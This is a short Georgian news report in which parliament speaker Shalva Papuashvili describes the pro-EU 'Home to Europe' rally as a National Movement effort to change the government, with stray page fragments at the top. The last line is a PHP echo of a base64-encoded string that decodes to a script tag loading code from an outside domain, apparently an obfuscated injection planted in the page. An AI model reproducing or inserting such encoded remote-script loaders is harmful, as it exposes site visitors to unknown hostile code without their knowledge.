celsiusi
ავერსი შნაიდერი
"აქციის ორგანიზატორი არის "ნაციონალური მოძრაობა", მისი ახალგაზრდული ფრთა, რაც შეეხება მიზანს, პირდაპირ მოწოდებაა ხელისუფლების შეცვლის" - განაცხადა ევროინტეგრაციის მხარდამჭერ "შინ ევროპისკენ" აქციასთან დაკავშირებით პარლამენტის თავმჯდომარე, შალვა პაპუაშვილმა. 
 
მისივე თქმით, დღეს აქციების და ხელისუფლების შეცვლის დრო არ არის და დროა მისცენ შესაძლებლობა სახელმწიფოს შექმნას ის პირობები, რომელიც ევროკომისიამ ქვეყანას წევრობის სტატუსის მინიჭებისთვის წაუყენა.
 
"საპოლიციო ძალებს, ამ საკითხებს, შსს აფასებს, ის იღებს გადაწყვეტილებებს, იმისთვის, რომ დაცული იყოს უსაფრთხოება მოქალაქეების, ისე აქციის მონაწილეების,ამიტომ ეს პირველად არ ხდება და უმნიშვნელოვანესია ყველას უსაფრთხოება დაცული. ამ აქციის ორგანიზატორი არის ნაციონალური მოძრაობა, მისი ახალგაზრდული ფრთა ერთი, მეორე რაც შეეხება მიზანს ამ აქციის, ვხედავთ განცხადებები რაც არის, პირდაპირ მოწოდებაა ასე ვთქვათ, ხელისუფლების შეცვლის და ა.შ დღეს აქციების და ხელისუფლების შეცვლის და ხელისუფლებაში მოსვლის დრო კი არ არის, თუკი ვინმეს აინტერესებს ევროპული პერსპექტივა და ჩვენი ოპონენტების ნაწილში ეჭვი მეპარება მათ ასეთი ინტერესი აქვთ, ეს არის ის მომენტი, როდესაც უნდა ერთი მხრივ მისცენ შესაძლებლობა სახელმწიფოს შექმნას ის პირობები, რომელიც წამოყენებულია", - ამბობს შალვა პაპუაშვილი.
 
"შინ ევროპისკენ" - ამ სახელწოდებით აქცია დღეს, 20 ივნისს, 20:00 საათზე რუსთაველზე გაიმართება. აქციაზე ქართველი ხალხი ევროპულ არჩევანს კიდევ ერთხელ დააფიქსირებს. ამავე მიზნით აქციები საქართველოს სხვა დიდ ქალაქებშიც გაიმართება. 
435
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");